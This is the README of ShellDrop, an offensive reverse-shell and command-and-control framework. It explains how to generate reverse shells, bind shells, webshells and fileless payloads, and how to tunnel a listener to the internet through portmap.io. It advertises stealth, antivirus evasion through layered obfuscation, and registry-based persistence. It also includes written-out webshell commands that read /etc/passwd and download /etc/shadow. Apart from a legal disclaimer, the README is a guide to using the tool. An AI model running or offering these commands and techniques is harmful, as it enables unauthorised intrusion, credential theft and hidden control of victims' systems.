Skip to content

kishwordulal1234/ShellDrop

Repository files navigation

🎯 ShellDrop — Advanced Multi-Platform Reverse Shell Framework

ShellDrop Banner

From Basic Listener → Hardened C2 → WAN-Enabled Framework — Five Generations of Evolution

Python 3.x License Version Payloads

Quick StartVersion ComparisonV5 FeaturesUsage GuidePayload TypesWAN SetupArchitectureLegal


🧠 Why ShellDrop?

┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│   🔐 HMAC-SHA256 Auth    Your C2 can't be hijacked                 │
│   🔒 XOR Traffic Enc     Passive captures see nothing              │
│   👻 Multi-Layer Obf     Static AV can't signature-match           │
│   🌐 WAN Port Forward   Auto Portmap.io VPN — attack from anywhere│
│   🥇 Fileless Payloads  Lives in RAM, never touches disk           │
│   🐚 Auto TTY Upgrade   Instant interactive shell, no manual work  │
│   📡 33+ Payloads        Linux, Windows, PHP, JS, Bind, Webshell   │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

📦 Repository Structure

ShellDrop/
├── shelldrop.py          # V1.0 Beta        — Basic multi-client listener
├── shelldrop-v2.py       # V2.0 Secure      — HMAC auth + session logging
├── sheldrop-v3.py        # V3.0 Obfuscated  — Hex payloads + OS filter + PHP/JS
├── shelldrop-v4.py       # V4.0 Hardened    — Encrypted logs + file transfer + rate limit
├── shelldrop-v5.py       # V5.0 WAN Edition — Portmap.io + Auto-TTY + Bind/Webshell/Fileless
├── configs/
│   └── rules/
│       └── config.json   # Portmap.io WAN configuration
├── configs/
│   └── unknonehart.sheldrop.ovpn  # OpenVPN config for portmap
├── shelldrop_logs/       # Encrypted session logs
├── banner.svg            # Animated 3D SVG banner
└── README.md             # This file

🏆 Version Comparison

  V1.0 Beta          V2.0 Secure         V3.0 Obfuscated     V4.0 Hardened       V5.0 WAN Edition
  ┌─────────┐        ┌─────────┐         ┌─────────┐         ┌─────────┐         ┌─────────┐
  │ 9 basic │───────▶│ 11 pay  │────────▶│ 15+ obf │────────▶│ 15+ obf │────────▶│ 33+ pay │
  │ payloads│        │ +HMAC   │         │ +PHP/JS │         │ +encrypt│         │ +WAN    │
  │ no auth │        │ +logging│         │ +filter │         │ +filetx │         │ +fileles│
  └─────────┘        └─────────┘         └─────────┘         └─────────┘         └─────────┘
Feature V1.0 Beta V2.0 Secure V3.0 Obfuscated V4.0 Hardened V5.0 WAN
Multi-Client
Payload Count 9 11 15+ 15+ 33+
Authentication ✅ HMAC ✅ HMAC ✅ HMAC ✅ HMAC
Payload Obfuscation ⚠️ Base64 ⚠️ Base64 ✅ Multi-layer ✅ Multi-layer ✅ Multi-layer
OS Filtering --sis --sis --sys + -t
PHP / Node.js Shells
Auto TTY Upgrade ⚠️ Manual ⚠️ Manual Automatic
Session Logging ✅ Plain ✅ Plain Encrypted Encrypted
File Upload/Download
Command History
Rate Limiting ✅ 3/60s ✅ 3/60s
Heartbeat ✅ 30s ✅ 30s
🌐 WAN / Portmap.io NEW
🔗 Bind Shell NEW
🌐 Webshell NEW
🥇 Fileless/Memory-Only NEW
Auto VPN Start NEW
Adapter Detection NEW
Sudo Auto-Prompt NEW
TLS Support
Architecture Globals Globals Globals OOP Class OOP Class

🚀 Quick Start

Install

git clone https://github.com/kishwordulal1234/ShellDrop.git
cd ShellDrop

Run V5 (Latest — Recommended)

# 🐧 Linux reverse shell payloads + WAN mode
python3 shelldrop-v5.py --sys=l -t=rv --wan

# 🪟 Windows fileless memory-only payloads
python3 shelldrop-v5.py --sys=w -t=fl -p 4444

# 🌐 Webshell payloads (PHP + JSP + ASPX)
python3 shelldrop-v5.py --sys=web -t=ws --wan

# 🔗 All bind shell payloads
python3 shelldrop-v5.py --sys=l -t=b --wan

Run Previous Versions

# V1 — Simple, no auth, quick testing
python3 shelldrop.py -p 4444

# V2 — Auth + logging
python3 shelldrop-v2.py -p 4444 --token "MyToken"

# V3 — Obfuscated payloads + OS filtering
python3 sheldrop-v3.py -p 4444 --sis=l --token "MyToken"

# V4 — Everything + encryption + file transfer
python3 shelldrop-v4.py -p 4444 --sis=l --token "MyToken"

🔥 V5.0 — WAN + AUTO-TTY Edition

What's New in V5

╔═══════════════════════════════════════════════════════════════╗
║           ShellDrop V 5.0 - WAN + AUTO-TTY EDITION           ║
║  Obfuscated & Encrypted Reverse Shell Framework              ║
╚═══════════════════════════════════════════════════════════════╝

  🔒 XOR Traffic Encryption: ENABLED       🌐 WAN Mode: PORTMAP.IO
  🔐 HMAC Authentication: ENABLED          🐚 Auto TTY: AUTOMATIC
  📝 Encrypted Logging: ENABLED            📡 Payloads: 33+
  🛡️ Rate Limiting: 3 attempts / 60s       🥇 Fileless: MEMORY-ONLY
Feature Description
🌐 WAN via Portmap.io Auto-starts OpenVPN, forwards ports, generates WAN payloads
🐚 Auto-TTY Upgrade Automatically upgrades shell to interactive TTY after OS detection
🔗 Bind Shell Target opens a port, you connect to it (5 variants)
🌐 Webshell PHP/JSP/ASPX webshells with password auth + file manager
🥇 Fileless Payloads Reflective load, WMI spawn, runspace injection, memfd_create
📡 33+ Payloads Across 7 categories: Linux, Windows, PHP, JS, Bind, Webshell, Fileless
🔍 Adapter Detection Auto-detects network adapter or manual -e wlp3s0
🔑 Sudo Auto-Prompt Asks password and re-launches as root automatically

📖 V5 Command Line Reference

python3 shelldrop-v5.py [OPTIONS]

  -p, --port PORT           Port to listen on (auto from config with --wan)
  -l, --listen-ip IP        Bind address (auto-detected)
  -e, --adapter ADAPTER     Network adapter (e.g. wlp3s0, tun0, eth0)
  --tls                     Enable TLS encryption
  --token TOKEN             Auth token (auto-generated if omitted)

  --sys {l,w,web}           Target OS filter:
                              l    = 🐧 Linux payloads
                              w    = 🪟 Windows payloads
                              web  = 🐘 PHP + 📦 JS payloads

  -t, --type {rv,b,ws,fl}   Payload type filter:
                              rv   = 🔄 Reverse Shell (default)
                              b    = 🔗 Bind Shell
                              ws   = 🌐 Webshell
                              fl   = 🥇 Fileless / Memory-Only

  --wan                     Enable WAN mode (auto Portmap.io VPN + payloads)
  --wan-config PATH         Config path (default: ./configs/rules/config.json)
  --log-dir DIR             Log directory (default: ./shelldrop_logs)

Flag Combinations

┌──────────────────────────────────────────────────────────────────────────────┐
│  COMMAND                                      │  WHAT YOU GET               │
├──────────────────────────────────────────────────────────────────────────────┤
│  --sys=l  -t=rv                               │  Linux reverse shells       │
│  --sys=l  -t=rv  --wan                        │  Linux reverse + WAN        │
│  --sys=w  -t=rv                               │  Windows reverse shells     │
│  --sys=w  -t=fl                               │  Windows fileless (RAM)     │
│  --sys=w  -t=fl  --wan                        │  Windows fileless + WAN     │
│  --sys=l  -t=b                                │  Linux bind shells          │
│  --sys=web -t=ws                              │  PHP/JSP/ASPX webshells     │
│  --sys=web -t=rv                              │  PHP + JS reverse shells    │
│  (no --sys, no -t)                            │  ALL 33+ payloads           │
│  --wan  (no -p)                               │  Auto port from config      │
└──────────────────────────────────────────────────────────────────────────────┘

🎯 Payload Types — -t Flag

🔄 Reverse Shell (-t=rv) — Default

Target connects back to you. You run the listener, target executes the payload.

  ┌─────────┐                              ┌──────────┐
  │ ATTACKER│◀────── TCP Connection ───────│  TARGET  │
  │ Listener│      (target connects back)  │ (payload)│
  │ :5354   │                              │          │
  └─────────┘                              └──────────┘
       ▲                                        │
       │         1. Start listener              │
       │         2. Copy payload                │
       │         3. Execute on target           │
       └────────────────────────────────────────┘

6 Linux variants:

# Method Stealth Survives Logout
1 Obfuscated Daemon ⭐ ★★★★★ ✅ Double-fork
2 Compressed + Encoded ★★★★★ ✅ Background
3 Nohup + Base64 ★★★★ ✅ Nohup
4 Screen Detached ★★★★★ ✅ Screen
5 Double-Encoded ★★★★ ✅ Disown
6 Bash Wrapper ★★★★ ✅ Nohup

6 Windows variants:

# Method Stealth
1 PS Hidden Start ★★★★★
2 PS Background Job ★★★★
3 PS WMI Create ★★★★★
4 PS Encoded (UTF-16LE) ★★★
5 Scheduled Task ★★★★
6 Python via PS ★★★★

PHP + Node.js — Save as .php or .js, deploy on web server.


🔗 Bind Shell (-t=b)

Target opens a port and waits for you to connect.

  ┌─────────┐                              ┌──────────┐
  │ ATTACKER│─────── TCP Connection ──────▶│  TARGET  │
  │  (you)  │      (you connect to them)   │ Listener │
  │         │                              │ :5354    │
  └─────────┘                              └──────────┘
       │                                        ▲
       │         1. Execute payload on target   │
       │         2. Target opens port           │
       │         3. Connect with: nc TARGET 5354│
       └────────────────────────────────────────┘
Payload Platform Auth
Python Bind Shell 🐧 Linux
Python Bind + Password 🐧 Linux ✅ Token
PowerShell Bind 🪟 Windows
Netcat Bind 🐧 Linux
Ncat + SSL Bind 🐧 Linux ✅ SSL

Usage:

# Generate bind shell payloads
python3 shelldrop-v5.py --sys=l -t=b -p 5354

# Execute payload on target, then connect:
nc TARGET_IP 5354

🌐 Webshell (-t=ws)

Upload a file to a web server. Execute commands via HTTP POST.

  ┌─────────┐          HTTP POST           ┌──────────┐
  │ ATTACKER│──────────────────────────────▶│ WEB      │
  │ (curl)  │   p=PASSWORD&c=whoami        │ SERVER   │
  │         │◀─────────────────────────────-│ shell.php│
  └─────────┘     <pre>www-data</pre>      └──────────┘
Payload Platform Features
PHP Webshell ⭐ Apache/Nginx Password auth, returns 404 to bots
PHP File Manager Apache/Nginx Upload/download files via curl
JSP Webshell Tomcat/Java Password auth
ASPX Webshell IIS/.NET Password auth

Setup:

# 1. Generate webshell
python3 shelldrop-v5.py --sys=web -t=ws -p 5354

# 2. Copy the PHP code, save as shell.php

# 3. Upload to target web server

# 4. Execute commands:
curl -s -X POST http://target.com/shell.php -d "p=PASSWORD&c=id"
curl -s -X POST http://target.com/shell.php -d "p=PASSWORD&c=cat /etc/passwd"

# 5. Upload a file:
curl -X POST http://target.com/shell.php -d "p=PASSWORD" -F "ul=@payload.sh"

# 6. Download a file:
curl -X POST http://target.com/shell.php -d "p=PASSWORD&dl=/etc/shadow" -o shadow.txt

🥇 Fileless / Memory-Only (-t=fl)

Never touches the disk. Lives entirely in RAM. AV/EDR has no file to scan.

  ┌──────────────────────────────────────────────────────────┐
  │                    TARGET SYSTEM                          │
  │                                                          │
  │  ┌─────────────┐    ┌──────────────────────────────┐    │
  │  │ powershell   │───▶│ MEMORY (RAM)                  │    │
  │  │ (parent)     │    │ ┌────────────────────────────┐│    │
  │  │              │    │ │ Decoded Base64 → Executed  ││    │
  │  │              │    │ │ Reverse Shell Connection   ││    │
  │  │              │    │ │ NO FILE WRITTEN TO DISK    ││    │
  │  │              │    │ └────────────────────────────┘│    │
  │  └─────────────┘    └──────────────────────────────────┘    │
  │                                                          │
  │  📁 Disk: EMPTY — Nothing for AV to scan                 │
  └──────────────────────────────────────────────────────────┘
Payload Platform Technique Persistence
Reflective Load ⭐ 🪟 Windows Base64 decode → execute in RAM ❌ Dies on reboot
WMI Spawn 🪟 Windows Runs inside wmiprvse.exe
Runspace Injection 🪟 Windows PS Runspace — zero disk I/O
Registry + Memory 🪟 Windows HKCU Run key + RAM exec ✅ Survives reboot
Python In-Memory 🐧 Linux Fork/setsid daemon in interpreter
memfd_create 🐧 Linux Anonymous memory FD — zero disk

Usage:

# Windows fileless payloads
python3 shelldrop-v5.py --sys=w -t=fl -p 4444

# Linux fileless payloads  
python3 shelldrop-v5.py --sys=l -t=fl --wan

# With persistence (registry key survives reboot)
# → Use "Windows Fileless + Registry Persistence" payload

🌐 WAN Mode Setup

How WAN Works

  ┌─────────────────┐      VPN Tunnel        ┌────────────────────┐
  │   YOUR MACHINE   │◀═══════════════════════▶│   PORTMAP.IO       │
  │                  │     OpenVPN             │   PUBLIC SERVER     │
  │  ShellDrop       │                         │                    │
  │  Listener :5354  │                         │  unknonehart-38596 │
  │                  │                         │  .portmap.host     │
  │  tun0: 10.9.x.x │                         │  :38596            │
  └─────────────────┘                         └────────────────────┘
                                                       ▲
                                                       │
                                               TCP Connection
                                                       │
                                              ┌────────────────────┐
                                              │      TARGET        │
                                              │  (anywhere on      │
                                              │   the internet)    │
                                              │                    │
                                              │  Runs WAN payload: │
                                              │  connect to        │
                                              │  portmap.host:38596│
                                              └────────────────────┘

  FLOW:
  1. ShellDrop starts OpenVPN → connects to portmap.io
  2. Portmap.io assigns: unknonehart-38596.portmap.host:38596
  3. Port 38596 on portmap → forwards to your local port 5354
  4. Target executes WAN payload → connects to portmap host:38596
  5. Portmap forwards → your ShellDrop listener on :5354
  6. You get the shell! 🐚

Step 1: Get Portmap.io Account

  1. Go to portmap.io
  2. Sign up / log in
  3. Download your OpenVPN config (.ovpn file)
  4. Create a TCP mapping rule (e.g., 38596 → 5354)

Step 2: Set Up Config

Place your .ovpn file:

cp ~/Downloads/unknonehart.sheldrop.ovpn configs/

Edit configs/rules/config.json:

{
    "portmap": {
        "config_path": "./configs/unknonehart.sheldrop.ovpn",
        "mapping_rule": "tcp://unknonehart-38596.portmap.host:38596 => 5354",
        "protocol": "tcp"
    },
    "iprule": {
        "ip": "unknonehart-38596.portmap.host",
        "port": "38596",
        "protocol": "tcp",
        "listen_port": "5354"
    }
}

Step 3: Run with --wan

# No -p needed — auto-reads port 5354 from config
python3 shelldrop-v5.py --sys=l -t=rv --wan

What happens automatically:

[!] ShellDrop requires root privileges.
[sudo] password for user: ********
[✓] Authenticated. Launching as root...
[*] Using listen port 5354 from config
[*] Starting portmap.io VPN: openvpn ./configs/unknonehart.sheldrop.ovpn
[*] Waiting for VPN tunnel to establish...
  [VPN] TCP connection established with 193.161.193.99:1194
  [VPN] Initialization Sequence Completed
[✓] VPN tunnel established!
[*] LAN adapter: wlp3s0 → 192.168.101.15
[*] Listening on 0.0.0.0 (all interfaces — LAN + VPN)
[✓] Listener active on 0.0.0.0:5354

═══ 📡 LAN PAYLOADS ═══
(payloads connecting to 192.168.101.15:5354)

═══ 🌐 WAN PAYLOADS ═══
(payloads connecting to unknonehart-38596.portmap.host:38596)

🏗️ Architecture

V5 System Architecture

┌───────────────────────────────────────────────────────────────────────────┐
│                          ShellDrop V5.0 Server                           │
├───────────────────────────────────────────────────────────────────────────┤
│                                                                           │
│  ┌─────────────────────────────────────────────────────────────────────┐  │
│  │                        MAIN ENTRY POINT                             │  │
│  │  • Sudo enforcement (getpass + exec)                                │  │
│  │  • Argparse (--sys, -t, --wan, -e, -p)                             │  │
│  │  • Config parser (configs/rules/config.json)                        │  │
│  │  • OpenVPN auto-start (portmap.io)                                  │  │
│  │  • Adapter detection (wlp3s0 / tun0 / eth0)                        │  │
│  └─────────────────────────────────────────────────────────────────────┘  │
│         │                                                                 │
│         ▼                                                                 │
│  ┌─────────────────────────────────────────────────────────────────────┐  │
│  │                     ShellDropServer CLASS                            │  │
│  │                                                                     │  │
│  │  ┌──────────────┐  ┌──────────────┐  ┌──────────────────────────┐  │  │
│  │  │  run()        │  │ Payload Gen  │  │  accept_connections()    │  │  │
│  │  │ • Show banner │  │ • 33+ paylds │  │  • HMAC challenge       │  │  │
│  │  │ • LAN paylds  │  │ • LAN + WAN  │  │  • Rate limiting        │  │  │
│  │  │ • WAN paylds  │  │ • All types  │  │  • Client creation      │  │  │
│  │  │ • User input  │  │              │  │                          │  │  │
│  │  └──────────────┘  └──────────────┘  └──────────────────────────┘  │  │
│  │                                                                     │  │
│  │  ┌──────────────────────────────────────────────────────────────┐   │  │
│  │  │                    Client CLASS                               │   │  │
│  │  │  • receive_data()    — XOR decrypt + output queue            │   │  │
│  │  │  • send_data()       — Command history + XOR encrypt         │   │  │
│  │  │  • _auto_tty_upgrade() — Auto script/pty after OS detect     │   │  │
│  │  │  • process_command() — upload/download/history/background    │   │  │
│  │  └──────────────────────────────────────────────────────────────┘   │  │
│  │                                                                     │  │
│  │  ┌──────────────┐  ┌──────────────┐  ┌──────────────────────────┐  │  │
│  │  │  SessionLog  │  │  Heartbeat   │  │  Rate Limiter            │  │  │
│  │  │ XOR encrypt  │  │ 30s keepalive│  │ 3 fails → 60s block     │  │  │
│  │  └──────────────┘  └──────────────┘  └──────────────────────────┘  │  │
│  └─────────────────────────────────────────────────────────────────────┘  │
│                                                                           │
└───────────────────────────────────────────────────────────────────────────┘

Authentication Flow

┌──────────┐                                           ┌──────────┐
│  TARGET  │                                           │ SHELLDROP│
│ (Client) │                                           │ (Server) │
└────┬─────┘                                           └────┬─────┘
     │                                                      │
     │  ──────── TCP Connect ──────────────────────────▶    │
     │                                                      │
     │  ◀─────── AUTH:<base64_challenge> ──────────────     │
     │                                                      │
     │  Compute: HMAC-SHA256(token, challenge)              │
     │                                                      │
     │  ──────── <base64_hmac_response> ───────────────▶    │
     │                                                      │
     │            ┌──── Verify HMAC ────┐                   │
     │            │ compare_digest()    │                   │
     │            │ timing-safe        │                   │
     │            └─────────┬──────────┘                   │
     │                      │                               │
     │  ◀─────── AUTH:OK ──┘  (or AUTH:FAIL + rate limit)  │
     │                                                      │
     │  ◀═══════ Interactive Shell ═════════════════════▶   │
     │           (XOR encrypted traffic)                    │
     │                                                      │
     │  [Auto TTY Upgrade if Linux detected]                │
     │                                                      │

Obfuscation Layers

┌─────────────────────────────────────────────────────────────┐
│                   PAYLOAD OBFUSCATION STACK                  │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  Layer 7  │  chr() Construction    │  String from ints      │
│  Layer 6  │  Double Base64         │  Two decode layers     │
│  Layer 5  │  Zlib Compression      │  Binary compressed     │
│  Layer 4  │  Base64 Wrapping       │  Payload body hidden   │
│  Layer 3  │  Import Aliasing       │  socket → _s           │
│  Layer 2  │  Variable Mangling     │  _s, _p, _o, _k        │
│  Layer 1  │  Hex Encoding          │  IP + token as hex     │
│                                                             │
│  Result: AV signature matching = IMPOSSIBLE                 │
│  Static analysis = DEFEATED                                 │
│  String grep for IP/token = NOTHING FOUND                   │
└─────────────────────────────────────────────────────────────┘

🎮 Interactive Commands

Main Menu

Command Description
list Show all active sessions with ID, IP, port, OS
use <id> Enter interactive session with client
kill <id> Terminate and remove a session
help Show available commands
exit / quit Shutdown listener and all sessions

Inside a Session

Command Description Version
background Return to main menu V1+
history Show last 20 commands + timestamps V4+
!<n> Re-execute command #n from history V4+
upload <local> <remote> Upload file to target V4+
download <remote> <local> Download file from target V4+

🔐 Security Architecture

Layer Protection Version
HMAC Auth Challenge-response prevents C2 hijacking V2+
Timing-Safe Compare hmac.compare_digest() prevents timing attacks V4+
Rate Limiting 3 failures → 60s IP block V4+
XOR Traffic Encryption All traffic XOR-encrypted V4+
Encrypted Logs Session logs XOR with token-derived key V4+
Heartbeat Dead session cleanup every 30s V4+
Input Sanitization Control character stripping V4+
Optional TLS Full SSL/TLS with --tls flag V2+

🔧 Troubleshooting

"Connection Refused" on WAN Payload

# 1. Check VPN is running
ip link show tun0

# 2. Verify listener is on 0.0.0.0 (not a specific IP)
# Use --wan flag to auto-bind to all interfaces

# 3. Check portmap mapping matches config
cat configs/rules/config.json

"Address Already in Use"

sudo lsof -i :5354
sudo kill -9 <PID>

Auth Failure

# Ensure token matches between listener and payload
# The token is auto-embedded in payloads — just copy the exact payload shown

📜 Changelog

v5.0 (Current — March 2026)

  • MAJOR: WAN mode — Auto Portmap.io VPN + WAN payloads
  • MAJOR: Bind shell — 5 variants (Python, PowerShell, netcat)
  • MAJOR: Webshell — PHP, JSP, ASPX with password auth + file manager
  • MAJOR: Fileless — Reflective load, WMI, runspace, memfd_create
  • ✨ Auto-TTY upgrade (automatic after OS detection)
  • --sys + -t dual filtering (--sys=l -t=fl)
  • ✨ Adapter auto-detection + -e flag
  • ✨ Sudo auto-prompt with password
  • ✨ 33+ total payloads

v4.0 (March 2026)

  • ✨ File upload/download
  • ✨ Command history + recall
  • ✨ XOR-encrypted session logs
  • ✨ Rate limiting + heartbeat
  • ✨ OOP architecture

v3.0 (March 2026)

  • ✨ Multi-layer payload obfuscation
  • --sis OS filtering
  • ✨ PHP + Node.js authenticated shells

v2.0 (February 2026)

  • ✨ HMAC-SHA256 authentication
  • ✨ Session logging + TLS

v1.0 Beta

  • ✅ Multi-client support + 9 payloads

⚠️ Legal Disclaimer

╔═══════════════════════════════════════════════════════════════╗
║                    ⚠️  LEGAL DISCLAIMER ⚠️                    ║
╠═══════════════════════════════════════════════════════════════╣
║                                                               ║
║  ShellDrop is developed for AUTHORIZED SECURITY TESTING ONLY  ║
║                                                               ║
║  📜 LICENSE TERMS:                                            ║
║  ✅ FREE to use, modify, and distribute                       ║
║  ✅ Must give credit to the original Author                   ║
║  ✅ Must include the LICENSE file in all copies                ║
║  ❌ Cannot sell without 30% revenue share to Author           ║
║  ❌ Author NOT liable for any misuse or damage                ║
║                                                               ║
║  Before using this tool, you MUST:                            ║
║  1. ✅ Have written authorization from the system owner        ║
║  2. ✅ Operate within scope of your penetration test           ║
║  3. ✅ Comply with all applicable laws and regulations         ║
║  4. ✅ Not use for malicious purposes                          ║
║  5. ✅ Maintain confidentiality of tokens and logs             ║
║                                                               ║
║  Any misuse or illegal activity is the USER's sole            ║
║  responsibility, NOT the developer's.                         ║
║                                                               ║
║  See LICENSE file for full terms.                             ║
║  PROFESSIONAL USE ONLY. BE ETHICAL. BE LEGAL.                 ║
╚═══════════════════════════════════════════════════════════════╝

👤 Author

unknone hart / kishwor dulal

🐛 Report Issues

Found a bug? Open an issue with: Python version, OS, error message, steps to reproduce, and ShellDrop version.

💬 Community

  • GitHub Issues — Bug reports
  • Pull Requests — Contributions welcome

🔖 Quick Reference Card

╔═══════════════════════════════════════════════════════════╗
║            ShellDrop v5.0 Quick Reference                 ║
╠═══════════════════════════════════════════════════════════╣
║                                                           ║
║ START (WAN + Auto Everything)                             ║
║ python3 shelldrop-v5.py --sys=l -t=rv --wan              ║
║                                                           ║
║ TARGET OS          PAYLOAD TYPE                           ║
║ --sys=l   Linux    -t=rv  Reverse Shell (default)        ║
║ --sys=w   Windows  -t=b   Bind Shell                     ║
║ --sys=web PHP+JS   -t=ws  Webshell                       ║
║                    -t=fl  Fileless (Memory-Only)          ║
║                                                           ║
║ MODIFIERS                                                 ║
║ --wan              Auto VPN + WAN payloads                ║
║ -p PORT            Manual port (auto with --wan)          ║
║ -e ADAPTER         Specific adapter (wlp3s0, tun0)       ║
║ --tls              TLS encryption                         ║
║ --token TOKEN      Custom auth token                      ║
║                                                           ║
║ SESSION COMMANDS                                          ║
║ list / use <id> / kill <id> / exit                        ║
║ history / !<n> / upload / download / background           ║
║                                                           ║
║ 🔐 HMAC Auth  🛡️ Rate Limit  🔒 XOR Encryption          ║
║ 🌐 WAN Mode   🥇 Fileless    🐚 Auto TTY                ║
╚═══════════════════════════════════════════════════════════╝

Made with ❤️ for the Security Community

V1.0 → V2.0 → V3.0 → V4.0 → V5.0 — Five Generations of Evolution

⬆ Back to Top

About

ShellDrop: Professional reverse shell listener for authorized penetration testing and red team ops. Features multi-client C2 interface, advanced payload generation, and stealth. ⚠️ Authorized use only; unauthorized is illegal

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages